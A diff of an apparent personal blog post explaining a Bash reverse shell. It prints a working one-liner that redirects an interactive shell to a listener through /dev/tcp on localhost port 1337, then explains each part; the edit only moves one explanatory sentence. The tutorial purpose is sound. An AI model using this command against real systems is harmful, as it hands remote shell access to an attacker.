mendhak/mendhak.github.io/posts/2024-08-14-simple-reverse-shell-in-linux-bash.md

 /bin/bash --rcfile <(echo "PS1='omghacker: '") -i >& /dev/tcp/127.0.0.1/1337 0>&1
 ```

 The `/bin/bash` starts a new shell.
 The `-i` makes it interactive.
-The `--rcfile` bit is just something I've added to make the prompt look different, but isn't necessary.
 The `>& /dev/tcp/...` redirects the input and output to the listener by making use of the [`/dev/tcp` feature in Linux Bash](2024-07-28-networking-cheat-sheet.md#reach-a-port-on-a-server).
 The `0>&1` redirects both standard input and output to the listener.
+The `--rcfile` bit is just something I've added for the next step, but isn't necessary.

 ## What happens?